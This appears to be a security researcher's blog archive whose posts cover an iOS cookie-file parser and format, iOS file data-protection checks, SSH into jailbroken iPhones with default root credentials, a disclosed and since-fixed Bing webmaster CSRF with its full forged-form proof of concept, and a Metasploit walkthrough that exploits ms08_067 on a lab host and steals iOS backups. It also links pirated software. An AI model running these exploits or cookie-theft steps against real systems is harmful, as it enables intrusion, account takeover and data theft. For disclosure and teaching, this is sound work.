 

Installing Mac OS X Mountain Lion in VMWare

22 Nov

Apple is no longer releasing updates for the Mac OS Lion Developer edition, so the DP4 VM is now outdated and the latest version of Xcode (4.5) does not work on it. To install Mountain Lion on VMware, follow the steps below.

Mountain Lion VM:
1) Download VMware workstation 8 – Torrent Link
2) Enable hardware virtualization in the computer BIOS – If you don’t know how to do this, Read this link
3) Download Mac OS X Mountain Lion Vmware Image - Torrent Link
4) Vmware does not support the virtualization of OS X. To unlock the Vmware, extract the Mountain Lion Vmware image and go to ‘VMware Unlocker – Mac OS X Guest\VMware 8.x Series\VMware Workstation Unlocker – Windows’ folder. Right click on the ‘Install.bat’ and run it as administrator. It patches the Vmware and allows the installation of Mac OS X.
5) In the extracted vmware image, click on the .vmx file and it will load the Mountain Lion VM.

Vmware Tools:
1. Edit virtual machine settings, go to ‘Cd/Dvd’ and use ‘VMware Unlocker – Mac OS X Guest\VMware 8.x Series\Tools\darwin.iso’ as iso image.

mountain lion vm settings

2. Power On the virtual machine and click on Finder. Click on the iSO image listed on the right side and install the vmware tools. Vmware tools installation displays ‘The Installation Failed’ message and that is expected.

mountain lion vmware tools

3. Restart the VM and now it supports the Full screen mode.

XCode
1. Open Mac AppStore and login with iTunes account.
2. Search for Xcode and install it. It installs the Xcode 4.5 & iOS 6 simulator.

mountain lion xcode

Note: I tried updating the VM to Mountain Lion 10.8.2 but did not succeed.

 
 

Safari/iOS – Cookies.binarycookies reader

27 Oct

Safari and iOS applications store persistent cookies in the Cookies.binarycookies file. This differs from other desktop browsers: Internet Explorer stores persistent cookies in text files under the Temporary Internet Files folder, while Firefox and Chrome store cookies in SQLite database files. It is very easy to read cookies stored in text files and SQLite databases, but there is no tool available to read the cookies from the binary Cookies.binarycookies file. So I wrote a Python script (BinaryCookieReader.py) that takes a Cookies.binarycookies file as input and dumps all the cookies in that file.

Usage of BinaryCookieReader
1. Download and install Python.
2. Add python installation folder to system PATH.
3. Download BinaryCookieReader.py
4. Open command prompt and run the below command. It dumps all the cookies from Cookies.binarycookies file.

python BinaryCookieReader.py [Cookies.binarycookies-file-path]

Cookies.binarycookies reader

On the iPhone, Safari and third-party iOS applications store cookies in Cookies.binarycookies files located at the path shown below. Only cookies created with a future expiration date (persistent cookies) are stored in the binary Cookies.binarycookies file.

Cookies.binarycookies location

Most iOS applications create session cookies with future expiration dates because they don’t want to prompt the user to log in every time. Usually those cookies never expire unless the user logs out of the application. Also, during an iTunes backup, the Cookies.binarycookies file is copied to the backup folder. So if someone gains access to your iPhone backup folder (Metasploit: Apple iOS backup extraction module), they can also get access to your email accounts and social network websites by reading the cookies from the Cookies.binarycookies file.

Cookies.binarycookies Format:

Cookies.binarycookies file is composed of several pages and each page can have one or more cookies. The complete file format is explained below:

File Format:
1. The file starts with a 4 byte magic string: cook. It is used to identify the file type.
2. Next four bytes is an integer specifying the number of pages in the file.
3. Following that, a 4 byte integer for each page, represents the page size.
4. Next to that, the file contains the actual page content. Each page is of length corresponding to the page size. Page format is explained below.
5. The file ends with an 8 byte value and it might be file checksum.

cookies.binarycookies-file format

Page Format:
1. Every page starts with a 4 byte page header: 0x00000100.
2. Next four bytes is an integer specifying the number of cookies in the page.
3. Following that, a 4 byte integer for each cookie, represents the cookie offset. Offset specifies the start of the cookie in bytes from the start of the page.
4. Next to that, the page contains the actual cookie contents. Each cookie is of variable length. Cookie format is explained below.
5. Page ends with a 4 byte value and it is always 0x00000000.

cookies.binarycookies- page format

Cookie Format:
1. First 4 bytes in the cookie is the size of the cookie.
2. The next 4 bytes are unknown (may be related to the cookie flags).
3. The next four bytes are the cookie flags. This is an integer value (1=Secure, 4=HttpOnly, 5=Secure+HttpOnly).
4. The next 4 bytes are unknown.
5. The next 4 bytes is an integer specifying the start of the url field in bytes from the start of the cookie record.
6. The next 4 bytes is an integer specifying the start of the name field in bytes from the start of the cookie record.
7. The next 4 bytes is an integer specifying the start of the path field in bytes from the start of the cookie record.
8. The next 4 bytes is an integer specifying the start of the value field in bytes from the start of the cookie record.
9. The next 8 bytes represent the end of the cookie and are always 0x0000000000000000.
10. The next 8 bytes are the cookie expiration date. The date is in Mac epoch format (Mac absolute time), which starts from Jan 2001.
11. The next 8 bytes are the cookie creation date.
12. Next to that, the cookie contains the actual cookie domain, name, path & value. The order is not specific and they can appear in any order.

Cookies.binarycookies cookie format

*LE – Little Endian
*BE – Big Endian
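The layout above as a bounds-checked parser, added here as an illustration and not taken from BinaryCookieReader.py. It assumes the file-level integers are big-endian, the page and cookie fields are little-endian and the two dates are 8-byte floats (the text above does not spell out the byte order); cookies are located purely through the offset table, so the parser does not depend on where the 4-byte zero marker sits. The sample file is constructed inline.

```python
import struct
from datetime import datetime, timedelta, timezone

MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)  # origin of Mac absolute time
FLAGS = {0: "", 1: "Secure", 4: "HttpOnly", 5: "Secure; HttpOnly"}

def cstr(buf, off):
    """NUL-terminated string at off; ValueError if the terminator is missing."""
    return buf[off:buf.index(b"\x00", off)].decode("utf-8", "replace")

def parse_cookie(rec):
    size, _, flags, _, url_o, name_o, path_o, val_o = struct.unpack_from("<8I", rec, 0)
    if size != len(rec) or rec[32:40] != b"\x00" * 8:
        raise ValueError("malformed cookie record")
    expiry, created = struct.unpack_from("<2d", rec, 40)   # seconds since 2001-01-01
    return {"domain": cstr(rec, url_o), "name": cstr(rec, name_o),
            "path": cstr(rec, path_o), "value": cstr(rec, val_o),
            "flags": FLAGS.get(flags, str(flags)),
            "expires": MAC_EPOCH + timedelta(seconds=expiry),
            "created": MAC_EPOCH + timedelta(seconds=created)}

def parse_page(page):
    if page[:4] != b"\x00\x00\x01\x00":
        raise ValueError("bad page header")
    (count,) = struct.unpack_from("<I", page, 4)
    cookies = []
    for off in struct.unpack_from("<%dI" % count, page, 8):   # cookie offset table
        (size,) = struct.unpack_from("<I", page, off)
        if size < 56 or off + size > len(page):
            raise ValueError("cookie record outside page")
        cookies.append(parse_cookie(page[off:off + size]))
    return cookies

def parse_binarycookies(data):
    if data[:4] != b"cook":
        raise ValueError("not a Cookies.binarycookies file")
    (npages,) = struct.unpack_from(">I", data, 4)
    sizes = struct.unpack_from(">%dI" % npages, data, 8)      # one size per page
    pos, cookies = 8 + 4 * npages, []
    for size in sizes:
        if pos + size > len(data):
            raise ValueError("truncated page")
        cookies += parse_page(data[pos:pos + size])
        pos += size
    return cookies

def build_sample():
    """Constructed one-page, one-cookie file (not real data)."""
    strings = [b".example.test\x00", b"sessionid\x00", b"/\x00", b"abc123\x00"]
    offs, pos = [], 56                       # strings start after the 56-byte header
    for s in strings:
        offs.append(pos)
        pos += len(s)
    rec = struct.pack("<8I", pos, 0, 5, 0, *offs) + b"\x00" * 8
    rec += struct.pack("<2d", 400000000.0, 370000000.0) + b"".join(strings)
    page = b"\x00\x00\x01\x00" + struct.pack("<2I", 1, 16) + b"\x00" * 4 + rec
    return b"cook" + struct.pack(">2I", 1, len(page)) + page + b"\x00" * 8

if __name__ == "__main__":
    for c in parse_binarycookies(build_sample()):
        print(c)
```

Malformed input surfaces as ValueError or struct.error rather than an out-of-range read, which matters when the file comes from an untrusted backup.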

References:
Tengu-Labs: Miyake%20-%20Safari%20Cookie.binarycookie%20Format%200_2[Draft].pdf
StackOverflow: safari-5-1-cookie-format-specs
Toolbox: understanding-the-safari-cookiesbinarycookies-file-format-49980

 
 

Extracting data protection class from files on iOS

18 Oct

On iOS, every file is encrypted with a unique encryption key, as illustrated in the image. The content of a file is encrypted with a per-file key, which is wrapped with a class key (data protection class key) and stored in the file’s metadata, which is in turn encrypted with the file system key (EMF key). The file system key is generated from the hardware UID. The UID is unique per device, embedded in hardware and inaccessible to code running on the CPU.

iOS Files encryption

Imagine a file that is encrypted only with the file system key: given physical access to the device, custom ramdisk techniques (ex: msft_guy automated custom ramdisk) can be used to steal the file from passcode-protected devices. Data protection was introduced to overcome this problem. It protects data at rest on iOS devices using encryption keys that are tied to the device passcode and UID. So if a file is protected with a data protection class and the user sets a passcode for the device, an attacker cannot access the file using the custom ramdisk technique unless he knows the passcode. Put simply, data protection adds another layer of security to files by encrypting them with a key generated from the passcode.

File protection is enabled by setting an accessibility constant on the NSFileProtectionKey file attribute. The file is then encrypted with the protection class key that corresponds to the accessibility constant set for that file.

Ex: If a file is marked with the NSFileProtectionComplete accessibility constant, the file is encrypted with the Class 1 protection class key and is available only when the user unlocks the device. If a file is created without specifying any accessibility constant, the file is marked as NSFileProtectionNone and is accessible even when the device is locked. The accessibility constants available for files are listed in the table below.

data protection classes for files in iOS

I wrote a program (FileDP) that takes a file as input and displays the accessibility constant of that file. The accessibility constant determines the type of class key. This helps during iOS application security assessments to identify whether sensitive files are protected with data protection or not.

Extracting data protection accessibility constant from files:
1. Download FileDP.
2. Copy FileDP to the iPhone over SSH using cyberduck or winscp.
3. Open  the terminal or putty and connect to the iPhone over SSH.
4. On ssh terminal, use the below command to provide executable permissions to FileDP.

chmod 777 FileDP

5. Use the below command to list the data protection accessibility constant of a file or of all the files in a directory.

./FileDP -[F/D] [FilePath/DirectoryPath]

data protection of all files in a directory

After running FileDP against an iOS application directory, I have noticed that the app preferences plist is not protected by data protection and it is marked as NSProtectionNone. The preferences plist is used by many applications to store configuration details and sensitive details like usernames, session cookies and authentication tokens. The preferences plist is usually generated by Xcode and the user has no control over the file attributes.

Ex: Facebook preferences plist – com.Facebook.Facebook.plist contains user authentication tokens and cookies. The below image shows that it is marked as NSFileProtectionNone.

data protection of a file on iPhone

 
 

SSH into iPhone over USB without Wi-Fi

11 Oct

SSH access to a jailbroken iPhone makes it easy to browse files and folders on the device. When the iPhone and the computer are connected to the same Wi-Fi network, it is easy to connect using any SSH client. SSH into the iPhone is also possible over a USB cable, which comes in handy when the iPhone is not connected to the network. The steps below explain how to SSH into the iPhone over a USB cable.

Steps to SSH into iPhone through USB Cable (windows):

1. Jailbreak the iPhone and install OpenSSH from Cydia.
2. Download Python 2.6 and install it to c:\python26 folder.
3. Download usbmuxd file and extract it to C drive using winrar.
4. Connect the iPhone to windows machine over USB cable.
5. Open command prompt and type the below commands.

C:\> cd usbmuxd-1.0.8
C:\usbmuxd-1.0.8>cd python-client
C:\usbmuxd-1.0.8\python-client>\Python26\python.exe tcprelay.py -t 22:2222

SSH into iPhone without Wi-Fi

6. Download putty and open it.
7. On putty, enter Host Name as 127.0.0.1 and Port as 2222. Select connection type as SSH and click Open.

SSH into iPhone with putty

8. Now you are connected to iPhone over SSH. Type the username as root and the password as alpine to log into the iPhone.

SSH into iPhone putty

Note: Usbmuxd is a Python module, so it works on Mac OS and other platforms as well. The only limitation is that we can open only one SSH connection at a time.

 
 

Microsoft Bing webmaster tools CSRF Vulnerability

17 Sep

I noticed a CSRF vulnerability in the Bing webmaster tools website while I was working on SEO stuff for my site. I reported the vulnerability to Microsoft and they have now fixed it. A CSRF attack on the webmaster tools website allows an attacker to change the logged-in user’s profile without his knowledge. Complete details about the vulnerability are provided below.

Bing webmaster tools are used by website administrators to improve site performance (SEO) in the Bing search engine. The user profile page in the webmaster tools website is vulnerable to a cross-site request forgery attack. Editing and saving the user’s profile in the webmaster tools website sends the below POST request to the server. Notice that the POST request does not contain any CSRF token in the body.

POST /webmaster/Home/AddSiteAndSaveProfile HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-IN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ssl.bing.com
Content-Length: 298
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SRCHUID=V=2&GUID=2462AEB887D84132AB0618A62918004E; SRCHD=SM=1&MS=2412868&D=2412867&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20120802; MUID=304F0F31C56C634E0FF80C81C4626317; sample=75; ANON=A=31F3C21150BD85D5D0D7A653FFFFFFFF&E=cf4&W=1; NAP=V=1.9&E=c9a&C=cXG_15GH6sC_sMrxIO7LQdDowldUlTqmQaeoYvbJnsysU1edgzUh7w&W=1; _HOP=I=1&TS=1346886727; _SS=SID=D678E4708A614DF29AE30B8C415F32BA

firstName=satish&lastName=bs&email=satishb3@hotmail.com&jobrole=&company=securitylearn.net&companysize=&industry=17&contactphone=&city=&state=&zip=&country=in&isAgency=false&communicationsOptIn=true&communicationsOptIn=false&emailFrequency=7&alert=2&alert=4&alert=3&alert=5&alerts=

This would allow an attacker to change the logged-in user’s profile without his knowledge by tricking him into visiting a URL which loads the below html file.

<form id=f1 action="https://ssl.bing.com/webmaster/Home/AddSiteAndSaveProfile" method="POST">
<input type="hidden" name="firstName" value="satish" />
<input type="hidden" name="lastName" value="bs" />
<input type="hidden" name="email" value="satishb3@hotmail.com" />
<input type="hidden" name="jobrole" value="" />
<input type="hidden" name="company" value="securitylearn.net" />
<input type="hidden" name="companysize" value="" />
<input type="hidden" name="industry" value="17" />
<input type="hidden" name="contactphone" value="" />
<input type="hidden" name="city" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="country" value="in" />
<input type="hidden" name="isAgency" value="false" />
<input type="hidden" name="communicationsOptIn" value="true" />
<input type="hidden" name="communicationsOptIn" value="false" />
<input type="hidden" name="emailFrequency" value="7" />
<input type="hidden" name="alert" value="2" />
<input type="hidden" name="alert" value="4" />
<input type="hidden" name="alert" value="3" />
<input type="hidden" name="alert" value="5" />
<input type="hidden" name="alerts" value="" />
</form>

Steps to verify:

  1. Open IE and log into Bing webmaster tools - http://www.bing.com/toolbox/webmaster
  2. Click on profile link (top right side) and look at the existing data.
  3. Create an html file with the above content & open it with IE. Later the html file prompts to open or save an attachment, click on cancel button.
  4. Now in the webmaster tools site, click on profile link and notice that the user data is replaced with the content in the html file.

 

CSRF tokens are not implemented across the whole website, making it vulnerable to CSRF attacks.
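The server-side check that the request above lacks, as an added example (not Microsoft's fix and not code from the original post): a per-session CSRF token verified in constant time, plus an Origin check. The `csrf_token` field name, the site origin, the session id and the shortened form body are assumptions constructed for the demo.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SERVER_KEY = secrets.token_bytes(32)               # demo secret; load from config in practice
SITE_ORIGIN = ("https", "webmaster.example.test")  # hypothetical site origin

def _mac(session_id, nonce):
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

def issue_token(session_id):
    """Token embedded in the profile form: random nonce plus a MAC bound to the session."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"

def token_valid(session_id, token):
    nonce, sep, mac = token.partition(".")
    # Compare as bytes so non-ASCII input cannot raise inside compare_digest.
    return bool(sep) and hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())

def check_profile_post(session_id, headers, body):
    """Return (accepted, reason) for a state-changing POST such as the profile save."""
    origin = headers.get("Origin")
    if origin is not None:
        parts = urlsplit(origin)
        if (parts.scheme, parts.netloc) != SITE_ORIGIN:
            return False, "cross-origin request"
    tokens = parse_qs(body, keep_blank_values=True).get("csrf_token", [])
    if len(tokens) != 1 or not token_valid(session_id, tokens[0]):
        return False, "missing or invalid CSRF token"
    return True, "ok"

# Constructed sample data: the body reuses field names from the request above.
SESSION = "constructed-session-id"
PROFILE = "firstName=satish&lastName=bs&company=securitylearn.net&country=in"

def demo():
    """Run the check over four constructed requests and return the verdicts."""
    forged = check_profile_post(SESSION, {"Origin": "https://attacker.example.test"}, PROFILE)
    no_token = check_profile_post(SESSION, {}, PROFILE)
    other = check_profile_post(SESSION, {}, PROFILE + "&csrf_token=" + issue_token("other-session"))
    genuine = check_profile_post(SESSION, {"Origin": "https://webmaster.example.test"},
                                 PROFILE + "&csrf_token=" + issue_token(SESSION))
    return forged, no_token, other, genuine

if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

Only the last request, which carries a token issued for the same session, is accepted; a token minted for a different session fails the MAC check.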

[TimeLine]
August 02, 2012, I have reported the vulnerability to Microsoft.
August 03, 2012 they have opened MSRC (Microsoft Security Response Center) case.
August 12, 2012, I have noticed that the vulnerability is being fixed and emailed them for the update.
August 14, 2012 they replied back with this message- “The product team is still actively investigating the issue to ensure a full understanding and comprehensive remediation.”
September 16, 2012, they fixed the vulnerability.

Microsoft is adding my name to their September 2012 security researchers list.

[Updated on - October 02, 2012]  
Microsoft added my name to September 2012 security researcher acknowledgements list-
http://technet.microsoft.com/en-us/security/cc308589

 
 

Metasploit post exploitation scripts to steal iOS 5 backups

09 Sep

Metasploit contains a post exploitation module that can be used to steal Apple iOS backup files from a victim’s computer. However, the existing module was designed for iOS 4 backups and does not support the latest iOS 5 backups. I have updated the scripts to make them work with iOS 5 backups.

Running the existing apple_ios_backup post exploitation module in Metasploit (v4.4.0) against an iOS 5 backup fails with the below exception.

meterpreter> run post/multi/gather/apple_ios_backup
[*] Checking for backups in C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup
[*] Found C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup\b716de79051ef093a98fc3ff1c46ca5e36faabc3
[*] Checking for backups in C:\Documents and Settings\SATISH-E6338BC0\Application Data\Apple Computer\MobileSync\Backup
[*] Pulling data from C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup\b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[*] Reading Manifest.mbdb from C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup\b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[*] Reading Manifest.mbdx from C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup\b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[-] Post failed: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.
[-] Call stack:
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/channels/pools/file.rb:35:in `open'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:325:in `_open'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:276:in `initialize'

The details below outline the usage of the updated Metasploit – Apple iOS Backup File Extraction module. I have used Metasploit 4.4 from Backtrack 5R1.

Apple iOS Backup File Extraction module is a post exploitation module. Metasploit says “The post-exploitation modules (post for short) are designed to run on systems that were compromised through another vector, whether its social engineering, a guessed password, or an unpatched vulnerability”. So in order to use the iOS backup module, first we have to compromise the system using some other vector.

Usage Steps:
1. Download the apple_ios_backup.rb and place it in /opt/metasploit/msf3/modules/post/multi/gather/ directory.
2. Download the apple_backup_manifestdb.rb and place it in /opt/metasploit/msf3/lib/rex/parser/ directory.
3. Open the Metasploit using msfconsole.
4. Use meterpreter as a payload and exploit a vulnerability in the target system.

In my case, the victim machine is running Windows XP (192.168.209.128), which is vulnerable to the ms08_067_netapi vulnerability. The below steps exploit the vulnerability and open a meterpreter shell.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set RHOST 192.168.209.128
RHOST => 192.168.209.128
msf  exploit(ms08_067_netapi) > exploit

5. Once the meterpreter session is established, the iOS backup on the victim machine can be dumped using the following command:

meterpreter> run post/multi/gather/apple_ios_backup

The above script searches for iOS backup files in the default iTunes backup locations. If it does not find any backup on the target system, it displays the ‘No users found with an iTunes backup directory’ message. If it finds a backup, it dumps all the files and stores them as db files in the ~/.msf4/loot/ directory.

iPhone backup path in windows & Mac OS x

Though the Apple iOS backup extraction module dumps all the files from the victim’s backup, the level of data revealed to the attacker depends on the type of the iOS backup. If the victim machine contains an encrypted backup, the information that we get from stealing the backup files is almost nothing, because all the files in the encrypted backup are encrypted with the user-supplied iTunes password. If the victim machine contains a normal backup, we can read the sensitive data stored in all files except the Keychain database. In the case of normal backups, the keychain is encrypted with a hardware key which is embedded in the iPhone.

The post module can steal iOS backups from Windows and Mac OS X machines. I have tested it on Windows. It should definitely work on OS X as well.

iOS backup is a treasure for pentesters. Happy hacking :)


 

[Update -October 11, 2012]: The module also works for iOS 6 backups. 

 
 